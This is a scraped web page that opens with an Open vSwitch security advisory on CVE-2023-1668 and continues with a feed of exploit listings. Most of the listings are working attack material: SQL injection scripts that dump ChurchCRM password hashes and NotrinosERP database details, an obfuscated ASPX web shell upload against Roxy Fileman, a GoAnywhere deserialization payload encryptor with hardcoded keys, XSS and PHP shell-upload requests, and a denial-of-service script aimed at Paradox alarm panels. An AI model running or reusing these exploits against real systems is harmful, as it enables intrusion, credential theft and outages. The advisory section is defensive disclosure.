A flaw was found in openvswitch (OVS). When processing an IP packet with protocol 0, OVS will install the datapath flow without the action modifying the IP header. This issue results (for both kernel and userspace datapath) in installing a datapath flow matching all IP protocols (nw_proto is wildcarded) for this flow, but with an incorrect action, possibly causing incorrect handling of other IP packets with a != 0 IP protocol that matches this dp flow.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[thread-next>\] \[day\] \[month\] \[year\] \[list\]

Date: Thu, 6 Apr 2023 19:37:53 +0200
From: Ilya Maximets <i.maximets@....org>
To: oss-security@...ts.openwall.com, ovs-announce@...nvswitch.org,
 ovs-discuss <ovs-discuss@...nvswitch.org>
Cc: i.maximets@....org, Aaron Conole <aconole@...hat.com>,
 Flavio Leitner <fbl@...hat.com>, David Marchand <david.marchand@...hat.com>
Subject: \[ADVISORY\] CVE-2023-1668: Open vSwitch: Remote traffic denial of
 service via crafted packets with IP proto 0

Description
===========

Multiple versions of Open vSwitch are vulnerable to crafted IP packets
with ip proto set to 0 causing a potential denial of service.
Triggering the vulnerability will require an attacker to send a crafted
IP packet with protocol field set to 0 and the flow rules to contain
'set' actions on other fields in the IP protocol header.  The resulting
flows will omit required actions, and fail to mask the IP protocol field,
resulting in a large bucket which captures all IP packets.

All versions of Open vSwitch at least as early as 1.5.0 are affected.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the identifier CVE-2023-1668 to this issue.


Mitigation
==========

For any version of Open vSwitch, preventing packets with network
protocol number '0' from reaching Open vSwitch will prevent the issue.
This is difficult to achieve because Open vSwitch obtains packets before
the iptables or nftables host firewall, so iptables or nftables on the
Open vSwitch host cannot ordinarily block the vulnerability.

Another method would be to add a high priority rule to the flow table
explicitly matching on nw protocol '0' and handling that traffic
separately:

    table=0 priority=32768,ip,nw\_proto=0,actions=drop
    table=0 priority=32768,ipv6,nw\_proto=0,actions=drop
    table=0 priority=32768,arp,arp\_op=0,actions=drop

All 3 OpenFlow rules should be added to every OVS bridge.  This can
be difficult to maintain during the service restart.


Fix
===

Patches to fix these vulnerabilities in Open vSwitch 2.13.x and newer:

\* 3.1.x:
  https://github.com/openvswitch/ovs/commit/61b39d8c4797f1b668e4d5e5350d639fca6082a9
\* 3.0.x:
  https://github.com/openvswitch/ovs/commit/0ec9af260ad84225e758d249fa32151ddf8a6520
\* 2.17.x:
  https://github.com/openvswitch/ovs/commit/27fb5db7f727ffc056f024f9ba4936facccb5f40
\* 2.16.x:
  https://github.com/openvswitch/ovs/commit/42f2b4b9b9a3c11d38f180bf1e35c47b77cd4ce8
\* 2.15.x:
  https://github.com/openvswitch/ovs/commit/f36509fd64e339ffd33593451099be6baa12ffe6
\* 2.14.x:
  https://github.com/openvswitch/ovs/commit/b46505f4d26cd4612a533687e7884efcb7a74111
\* 2.13.x:
  https://github.com/openvswitch/ovs/commit/7fa0106e8594c34f9e16efd87a58e38a947c6c5b

Recommendation
==============

We recommend that users of Open vSwitch apply the linked patches, or
upgrade to a known patched version of Open vSwitch.  These include:

\* 3.1.1
\* 3.0.4
\* 2.17.6
\* 2.16.7
\* 2.15.8
\* 2.14.9
\* 2.13.11


Acknowledgements
================

The Open vSwitch team wishes to thank the reporter:

      David Marchand <dmarchan@...hat.com>
**Download attachment "**OpenPGP\_0xB9F7EC77C829BF96.asc**" of type "**application/pgp-keys**" (4740 bytes)**

**Download attachment "**OpenPGP\_signature**" of type "**application/pgp-signature**" (841 bytes)**

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2023-1668: security - [ADVISORY] CVE-2023-1668: Open vSwitch: Remote traffic denial of service via crafted packets with IP proto 0

ChurchCRM version 4.5.1 suffers from a remote authenticated SQL injection vulnerability.

    # Exploit Title: ChurchCRM 4.5.1 - Authenticated SQL Injection# Date: 11-03-2023# Exploit Author: Arvandy# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24787/CVE-2023-24787.md# Software Link: https://github.com/ChurchCRM/CRM/releases# Vendor Homepage: http://churchcrm.io/# Version: 4.5.1# Tested on: Windows, Linux# CVE: CVE-2023-24787"""The endpoint /EventAttendance.php is vulnerable to Authenticated SQL Injection (Union-based and Blind-based) via the Event GET parameter.This endpoint can be triggered through the following menu: Events - Event Attendance Reports - Church Service/Sunday School. The Event Parameter is taken directly from the query string and passed into the SQL query without any sanitization or input escaping.This allows the attacker to inject malicious Event payloads to execute the malicious SQL query.This script is created as Proof of Concept to retrieve the username and password hash from user_usr table."""import sys, requestsdef dumpUserTable(target, session_cookies):        print("(+) Retrieving username and password")    print("")    url = "%s/EventAttendance.php?Action=List&Event=2+UNION+ALL+SELECT+1,NULL,CONCAT('Perseverance',usr_Username,':',usr_Password),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+from+user_usr--+-&Type=Sunday School" % (target)    headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'CRM-2c90cf299230a50dab55aee824ed9b08='+str(session_cookies)}                  r = requests.get(url, headers=headers)    lines = r.text.splitlines()        for line in lines:         if "<td >Perseverance" in line:            print(line.split("Perseverance")[1].split("</td>")[0])    def login(target, username, password):    target = "%s/session/begin" % (target)    headers = {'Content-Type': 'application/x-www-form-urlencoded'}    data = "User=%s&Password=%s" % (username, password)    s = requests.session()    r = s.post(target, data = data, headers = headers)    return s.cookies.get('CRM-2c90cf299230a50dab55aee824ed9b08')def main():    print("(!) Login to the target application")    session_cookies = login(target, username, password)               print("(!) Exploiting the Auth SQL Injection to retrieve the username and password hash")    dumpUserTable(target, session_cookies)    if __name__ == "__main__":    if len(sys.argv) != 4:        print("(!) Usage: python3 exploit.py <URL> <username> <password>")        print("(!) E.g.,: python3 exploit.py http://192.168.1.100/ChurchCRM user pass")        sys.exit(-1)    target = sys.argv[1]    username = sys.argv[2]    password = sys.argv[3]        main()

ChurchCRM 4.5.1 SQL Injection

NotrinosERP version 0.7 suffers from a remote authentication blind SQL injection vulnerability.

    # Exploit Title: NotrinosERP 0.7 - Authenticated Blind SQL Injection# Date: 11-03-2023# Exploit Author: Arvandy# Blog Post: https://github.com/arvandy/CVE/blob/main/CVE-2023-24788/CVE-2023-24788.md# Software Link: https://github.com/notrinos/NotrinosERP/releases/tag/0.7# Vendor Homepage: https://notrinos.com/# Version: 0.7# Tested on: Windows, Linux# CVE: CVE-2023-24788"""The endpoint /sales/customer_delivery.php is vulnerable to Authenticated Blind SQL Injection (Time-based) via the GET parameter OrderNumber. This endpoint can be triggered through the following menu: Sales - Sales Order Entry - Place Order - Make Delivery Against This Order.The OrderNumber parameter require a valid orderNumber value.This script is created as Proof of Concept to retrieve database name and version through the Blind SQL Injection that discovered on the application."""import sys, requestsdef injection(target, inj_str, session_cookies):        for j in range(32, 126):        url = "%s/sales/customer_delivery.php?OrderNumber=%s" % (target, inj_str.replace("[CHAR]", str(j)))        headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}                      r = requests.get(url, headers=headers)        res = r.text        if "NotrinosERP 0.7 - Login" in res:            session_cookies = login(target, username, password)            headers = {'Content-Type':'application/x-www-form-urlencoded','Cookie':'Notrinos2938c152fda6be29ce4d5ac3a638a781='+str(session_cookies)}            r = requests.get(url, headers=headers)        elif (r.elapsed.total_seconds () > 2 ):            return j    return Nonedef login(target, username, password):    target = "%s/index.php" % (target)    headers = {'Content-Type': 'application/x-www-form-urlencoded'}    data = "user_name_entry_field=%s&password=%s&company_login_name=0" % (username, password)    s = requests.session()    r = s.post(target, data = data, headers = headers)    return s.cookies.get('Notrinos2938c152fda6be29ce4d5ac3a638a781')    def retrieveDBName(session_cookies):       db_name = ""    print("(+) Retrieving database name")    for i in range (1,100):        injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+DATABASE()),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            db_name += chr(retrieved_value)                    else:            break    print("Database Name: "+db_name) def retrieveDBVersion(session_cookies):    db_version = ""    print("(+) Retrieving database version")    for i in range (1,100):        injection_str = "15+UNION+SELECT+IF(ASCII(SUBSTRING((SELECT+@@version),%d,1))=[CHAR],SLEEP(2),null)-- -" % i        retrieved_value = injection(target, injection_str, session_cookies)        if (retrieved_value):            db_version += chr(retrieved_value)            sys.stdout.flush()        else:            break    print("Database Version: "+db_version)def main():    print("(!) Login to the target application")    session_cookies = login(target, username, password)           print("(!) Exploiting the Blind Auth SQL Injection to retrieve database name and versions")    retrieveDBName(session_cookies)    print("")    retrieveDBVersion(session_cookies)    if __name__ == "__main__":    if len(sys.argv) != 4:        print("(!) Usage: python3 exploit.py <URL> <username> <password>")        print("(!) E.g.,: python3 exploit.py http://192.168.1.100/NotrinosERP user pass")        sys.exit(-1)    target = sys.argv[1]    username = sys.argv[2]    password = sys.argv[3]        main()

NotrinosERP 0.7 SQL Injection

Roxy Fileman versions 1.4.5 and below for .NET suffer from a remote shell upload vulnerability.

    # Exploit Title: Roxy Fileman 1.4.5 For .NET Arbitrary File Upload# Date: 09/04/2023# Exploit Author: Zer0FauLT [admindeepsec@proton.me]# Vendor Homepage: roxyfileman.com# Software Link: https://web.archive.org/web/20190317053437/http://roxyfileman.com/download.php?f=1.4.5-net# Version: <= 1.4.5# Tested on: Windows 10 and Windows Server 2019# CVE : 0DAY###########################################################################################                First, we upload the .jpg shell file to the server.                     ###########################################################################################POST /admin/fileman/asp_net/main.ashx?a=UPLOAD HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 666Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: */*Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygOxjsc2hpmwmISeJSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="action"upload------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="method"ajax------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="d"/Upload/PenTest------WebKitFormBoundarygOxjsc2hpmwmISeJContent-Disposition: form-data; name="files[]"; filename="test.jpg"Content-Type: image/jpegâ€°PNG<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %><%var PAY:String=Request["\x61\x62\x63\x64"];eval(PAY,"\x75\x6E\x73\x61"+"\x66\x65");%>------WebKitFormBoundarygOxjsc2hpmwmISeJ--###########################################################################################   In the second stage, we manipulate the .jpg file that we uploaded to the server.     ###########################################################################################{"FILES_ROOT":          "","RETURN_URL_PREFIX":   "","SESSION_PATH_KEY":    "","THUMBS_VIEW_WIDTH":   "140","THUMBS_VIEW_HEIGHT":  "120","PREVIEW_THUMB_WIDTH": "300","PREVIEW_THUMB_HEIGHT":"200","MAX_IMAGE_WIDTH":     "1000","MAX_IMAGE_HEIGHT":    "1000","INTEGRATION":         "ckeditor","DIRLIST":             "asp_net/main.ashx?a=DIRLIST","CREATEDIR":           "asp_net/main.ashx?a=CREATEDIR","DELETEDIR":           "asp_net/main.ashx?a=DELETEDIR","MOVEDIR":             "asp_net/main.ashx?a=MOVEDIR","COPYDIR":             "asp_net/main.ashx?a=COPYDIR","RENAMEDIR":           "asp_net/main.ashx?a=RENAMEDIR","FILESLIST":           "asp_net/main.ashx?a=FILESLIST","UPLOAD":              "asp_net/main.ashx?a=UPLOAD","DOWNLOAD":            "asp_net/main.ashx?a=DOWNLOAD","DOWNLOADDIR":         "asp_net/main.ashx?a=DOWNLOADDIR","DELETEFILE":          "asp_net/main.ashx?a=DELETEFILE","MOVEFILE":            "asp_net/main.ashx?a=MOVEFILE","COPYFILE":            "asp_net/main.ashx?a=COPYFILE","RENAMEFILE":          "asp_net/main.ashx?a=RENAMEFILE","GENERATETHUMB":       "asp_net/main.ashx?a=GENERATETHUMB","DEFAULTVIEW":         "list","FORBIDDEN_UPLOADS":   "zip js jsp jsb mhtml mht xhtml xht php phtml php3 php4 php5 phps shtml jhtml pl sh py cgi exe application gadget hta cpl msc jar vb jse ws wsf wsc wsh ps1 ps2 psc1 psc2 msh msh1 msh2 inf reg scf msp scr dll msi vbs bat com pif cmd vxd cpl htpasswd htaccess","ALLOWED_UPLOADS":     "bmp gif png jpg jpeg","FILEPERMISSIONS":     "0644","DIRPERMISSIONS":      "0755","LANG":                "auto","DATEFORMAT":          "dd/MM/yyyy HH:mm","OPEN_LAST_DIR":       "yes"}#############################################################################################################################################################################################################################   We say change the file name and we change the relevant "asp_net/main.ashx?a=RENAMEFILE" parameter with the "asp_net/main.ashx?a=MOVEFILE" parameter and manipulate the paths to be moved on the server as follows.     #############################################################################################################################################################################################################################POST /admin/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 44Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7f=%2FUpload%2FPenTest%2Ftest.jpg&n=test.aspx===========================================================================================================================================================================================================================POST /admin/fileman/asp_net/main.ashx?a=MOVEFILE&f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx HTTP/2Host: pentest.comCookie: Customer=Id=bkLCsV0Qr6mLH0+CgfcP0w==&Data=/2EMzCCeHGKADtgbKxqVyPZUIM25GBCMMU+Dlc7p8eRUNvoRLZaKEsUclgMRooB3akJsVikb4hTNNkDeE1Dr4Q==; roxyview=list; roxyld=%2FUpload%2FPenTestContent-Length: 68Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestSec-Ch-Ua-Mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Origin: https://pentest.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://pentest.com/admin/fileman/index.aspxAccept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7f=%2FUpload%2FPenTest%2Ftest.jpg&n=%2FUpload%2FNewFolder%2Ftest.aspx###########################################################################################                                 and it's done!                                         ###########################################################################################HTTP/2 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Vary: Accept-EncodingServer: Microsoft-IIS/10.0X-Aspnet-Version: 4.0.30319X-Powered-By-Plesk: PleskWinDate: Sun, 09 Apr 2023 09:49:34 GMTContent-Length: 21{"res":"ok","msg":""}=============================================================================================

Roxy Fileman 1.4.5 Shell Upload

The Microsoft Windows kernel suffers from multiple issues with subkeys of transactionally renamed registry keys.

Windows Kernel Registry Key Issue

Goanywhere Encryption Helper version 7.1.1 suffers from a remote code execution vulnerability.

    // Exploit Title: Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)// Google Dork:  title:"GoAnywhere" // Date: 3/26/2023// Exploit Author: Youssef Muhammad// Vendor Homepage: https://www.goanywhere.com/// Software Link:  https://www.dropbox.com/s/j31l8lgvapbopy3/ga7_0_3_linux_x64.sh?dl=0// Version:  > 7.1.1 for windows / > 7.0.3 for Linux // Tested on: Windows, Linux// CVE : CVE-2023-0669// This script is needed to encrypt the serialized payload generated by the ysoserial tool in order to achieve Remote Code Execution import java.util.Base64;import javax.crypto.Cipher;import java.nio.charset.StandardCharsets;import javax.crypto.SecretKeyFactory;import javax.crypto.spec.PBEKeySpec;import javax.crypto.spec.IvParameterSpec;import javax.crypto.spec.SecretKeySpec;import java.nio.file.Files;import java.nio.file.Paths;public class CVE_2023_0669_helper {    static String ALGORITHM = "AES/CBC/PKCS5Padding";    static byte[] KEY = new byte[30];    static byte[] IV = "AES/CBC/PKCS5Pad".getBytes(StandardCharsets.UTF_8);    public static void main(String[] args) throws Exception {        if (args.length != 2) {            System.out.println("Usage: java CVE_2023_0669_helper <file_path> <version>");            System.exit(1);        }        String filePath = args[0];        String version = args[1];        byte[] fileContent = Files.readAllBytes(Paths.get(filePath));        String encryptedContent = encrypt(fileContent, version);        System.out.println(encryptedContent);    }    public static String encrypt(byte[] data, String version) throws Exception {        Cipher cipher = Cipher.getInstance(ALGORITHM);        KEY = (version.equals("2")) ? getInitializationValueV2() : getInitializationValue();        SecretKeySpec keySpec = new SecretKeySpec(KEY, "AES");        IvParameterSpec ivSpec = new IvParameterSpec(IV);        cipher.init(Cipher.ENCRYPT_MODE, keySpec, ivSpec);        byte[] encryptedObject = cipher.doFinal(data);        String bundle = Base64.getUrlEncoder().encodeToString(encryptedObject);        String v = (version.equals("2")) ? "$2" : "";        bundle += v;        return bundle;    }    private static byte[] getInitializationValue() throws Exception {        // Version 1 Encryption        String param1 = "go@nywhereLicenseP@$$wrd";        byte[] param2 = {-19, 45, -32, -73, 65, 123, -7, 85};        return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 9535, 256)).getEncoded();    }    private static byte[] getInitializationValueV2() throws Exception {        // Version 2 Encryption        String param1 = "pFRgrOMhauusY2ZDShTsqq2oZXKtoW7R";        byte[] param2 = {99, 76, 71, 87, 49, 74, 119, 83, 109, 112, 50, 75, 104, 107, 56, 73};        return SecretKeyFactory.getInstance("PBKDF2WithHmacSHA1").generateSecret(new PBEKeySpec(new String(param1.getBytes(), "UTF-8").toCharArray(), param2, 3392, 256)).getEncoded();    }}

Goanywhere Encryption Helper 7.1.1 Remote Code Execution

WebsiteBaker version 2.13.3 suffers from a cross site scripting vulnerability.

    Exploit Title: WebsiteBaker v2.13.3 - Cross-Site Scripting (XSS)Application: WebsiteBakerVersion: 2.13.3Bugs:  Stored XSSTechnology: PHPVendor URL: https://websitebaker.org/pages/en/home.phpSoftware Link: https://wiki.websitebaker.org/doku.php/en/downloadsDate of found: 02.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1.Anyone who has the authority to create the page can do thispayload: %3Cimg+src%3Dx+onerror%3Dalert%281%29%3EPOST /admin/pages/add.php HTTP/1.1Host: localhostContent-Length: 137Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: nullContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D; PHPSESSID-WB-0e93a2=pj9s35ka639m9bim2a36rtu5g9Connection: closeb7faead37158f739=dVhd_I3X7317NvoIzyGpMQ&title=%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&type=wysiwyg&parent=0&visibility=public&submit=Add2. Visit http://localhost/

WebsiteBaker 2.13.3 Cross Site Scripting

ESET Service version 16.0.26.0 suffers from an unquoted service path vulnerability.

    # Exploit Title: ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path# Exploit Author: Milad Karimi (Ex3ptionaL)# Exploit Date: 2023-04-05# Vendor : https://www.eset.com# Version : 16.0.26.0# Tested on OS: Microsoft Windows 11 pro x64#PoC :==============C:\>sc qc ekrn[SC] QueryServiceConfig SUCCESSSERVICE_NAME: ekrn        TYPE               : 20  WIN32_SHARE_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : "C:\Program Files\ESET\ESET Security\ekrn.exe"        LOAD_ORDER_GROUP   : Base        TAG                : 0        DISPLAY_NAME       : ESET Service        DEPENDENCIES       :        SERVICE_START_NAME : LocalSystem

ESET Service 16.0.26.0 Unquoted Service Path

dotclear version 2.25.3 suffers from a remote shell upload vulnerability.

    Exploit Title: dotclear 2.25.3 - Remote Code Execution (RCE) (Authenticated)Application: dotclearVersion: 2.25.3Bugs:  Remote Code Execution (RCE) (Authenticated) via file uploadTechnology: PHPVendor URL: https://dotclear.org/Software Link: https://dotclear.org/downloadDate of found: 08.04.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================While writing a blog post, we know that we can upload images. But php did not allow file upload. This time<?php echo system("id"); ?> I wrote a file with the above payload, a poc.phar extension, and uploaded it.We were able to run the php code when we visited your pagepoc request:POST /dotclear/admin/post.php HTTP/1.1Host: localhostContent-Length: 566Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: dcxd=f3bb50e4faebea34598cf52bcef38548b68bc1ccConnection: closepost_title=Welcome+to+Dotclear%21&post_excerpt=&post_content=%3Cp%3EThis+is+your+first+entry.+When+you%27re+ready+to+blog%2C+log+in+to+edit+or+delete+it.fghjftgj%3Ca+href%3D%22%2Fdotclear%2Fpublic%2Fpoc.phar%22%3Epoc.phar%3C%2Fa%3E%3C%2Fp%3E%0D%0A&post_notes=&id=1&save=Save+%28s%29&xd_check=ca4243338e38de355f21ce8a757c17fbca4197736275ba4ddcfced4a53032290d7b3c50badd4a3b9ceb2c8b3eed2fc3b53f0e13af56c68f2b934670027e12f4e&post_status=1&post_dt=2023-04-08T06%3A37&post_lang=en&post_format=xhtml&cat_id=&new_cat_title=&new_cat_parent=&post_open_comment=1&post_password=poc video : https://youtu.be/oIPyLqLJS70

dotclear 2.25.3 Shell Upload

Paradox Security Systems version IPR512 suffers from a denial of service vulnerability.

#!/bin/bash

# Exploit Title: Paradox Security Systems IPR512 - Denial Of Service  
# Google Dork: intitle:"ipr512 * - login screen"  
# Date: 09-APR-2023  
# Exploit Author: Giorgi Dograshvili  
# Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423)  
# Version: IPR512  
# CVE : CVE-2023-24709

# Function to display banner message  
display_banner() {  
  echo "******************************************************"  
  echo "*                                                    *"  
  echo "*                PoC CVE-2023-24709                  *"  
  echo "*      BE AWARE!!! RUNNING THE SCRIPT WILL MAKE      *"  
  echo "*    A DAMAGING IMPACT ON THE SERVICE FUNCTIONING!   *"  
  echo "*                                by SlashXzerozero   *"  
  echo "*                                                    *"  
  echo "******************************************************"  
}

# Call the function to display the banner  
display_banner  
  echo ""  
  echo ""  
  echo "Please enter a domain name or IP address with or without port"  
read -p  "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain

# Step 2: Ask for user confirmation  
read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm  
if [[ $confirm == "Y" || $confirm == "y" ]]; then  
  # Display loading animation  
  animation=("|" "/" "-" "\\")  
  index=0  
  while [[ $index -lt 10 ]]; do  
    echo -ne "Loading ${animation[index]} \r"  
    sleep 1  
    index=$((index + 1))  
  done

  # Use curl to send HTTP GET request with custom headers and timeout  
  response=$(curl -i -s -k -X GET \  
    -H "Host: $domain" \  
    -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \  
    -H "Accept: */" \  
    -H "Referer: http://$domain/login.html" \  
    -H "Accept-Encoding: gzip, deflate" \  
    -H "Accept-Language: en-US,en;q=0.9" \  
    -H "Connection: close" \  
    --max-time 10 \  
    "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982")

  # Check response for HTTP status code 200 and print result  
  if [[ $response == *"HTTP/1.1 200 OK"* ]]; then  
    echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html"  
  else  
    echo -e "\nShouldn't be vulnerable! Please check the webpanel:  http://$domain/login.html"  
  fi  
else  
  echo "The script is stopped!."  
fi

Tag

#windows